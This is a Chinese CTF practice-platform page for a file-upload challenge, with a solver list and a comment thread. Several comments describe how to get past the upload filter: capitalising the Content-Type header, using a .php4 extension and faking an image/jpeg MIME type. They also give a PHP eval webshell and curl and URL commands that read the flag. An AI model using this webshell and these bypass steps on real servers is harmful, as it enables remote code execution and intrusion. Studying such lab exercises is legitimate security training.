评分(22)
解题动态
CTF-大王 攻破了该题 3天前
Kur0Ai1uro. 攻破了该题 3天前
channigo 攻破了该题 3天前
这个昵称已存在 攻破了该题 4天前
星宇Sec 攻破了该题 4天前
ZyTbF521 攻破了该题 4天前
pongcx 攻破了该题 4天前
我只有两题不会 攻破了该题 5天前
香克斯呀 攻破了该题 6天前
TiLM3481 攻破了该题 6天前
xiaomenghua 攻破了该题 7天前
658658xzlz 攻破了该题 7天前
yansheng192 攻破了该题 7天前
Vamos 攻破了该题 8天前
暗流安全 攻破了该题 9天前
mangren 攻破了该题 9天前
candace 攻破了该题 9天前
Empty666 攻破了该题 9天前
mystery 攻破了该题 10天前
评论
我只有两题不会 7天前
举报
想知道各位大佬,不看源码,不看别人的wp,是怎样做出来的?
壮志凌云 1月前
举报
上传用shell.php4,请求头Content-Type的m大写,后缀改php4,MIME改image/jpeg。上传成功后curl -X POST http://160.202.254.160:17175/upload/xxx.php4 -d "cmd=system('cat /flag');"拿flag。
灵梦归希 1月前
举报
$allowexts = array('jpg','gif','jpeg','bmp','php4');看着源代码真恶心
公良棉 3月前
举报
接着我和评论区大部分人都发现,一句话木马蚁剑连不上或者返回为空,看了wp,发现wp在bp的Repeater完成的,而且flag直接就放在返回页了,于是我构造了一个最简单(评论区发不出来)拿flag的纯php文件,发现按之前操作更改后可以成功上传,但并没有返回flag,不过却从响应头里看到Upload Success下还有信息,是关于url地址的,以此构造完整url类似前往页面便拿到flag
公良棉 3月前
举报
说说这个题的路程,bp抓包,首先Content-Type: multipart/form-data;,这个玩意要改个字母大写(我只试过m,其他的等后来者)不然上传不了(具体原因评论区有大佬的推测),接着改 filename的后缀为php4(wp竟然笔误写成php5),最后改Content-Type:为 image/jpeg,就能上传成功。
公良棉 3月前
举报
flag{*******}
suxiansheng 4月前
举报
https://blog.csdn.net/wangsu327/article/details/161358987?spm=1011.2124.3001.6209
店晓贰 3月前
举报
关键点再header里的Content-Type
fyjfjk 4月前
举报
屎
爱喝畅汁 6月前
举报
随便一张图片,用记事本打开写入一句话木马,上传之后点击提交时抓包,抓包之后修改三处:1.Content-Type 修改为:image/jpeg 2.文件名后缀修改为:php4 3.head头修改为Multipart/form-data,放行之后图片就成功上传了,再使用蚁剑进行连接即可
是小白鸭 6月前
举报
方法分享:1.php内容:<?php eval($_REQUEST[cmd]);?>。2.绕过。3.运行php寻找flag位置,url?cmd=print_r(scandir['.']); 。4.发现flag文件,url?cmd=echo file_get_contents('../../../../flag'); 。初学者的一点小分享:)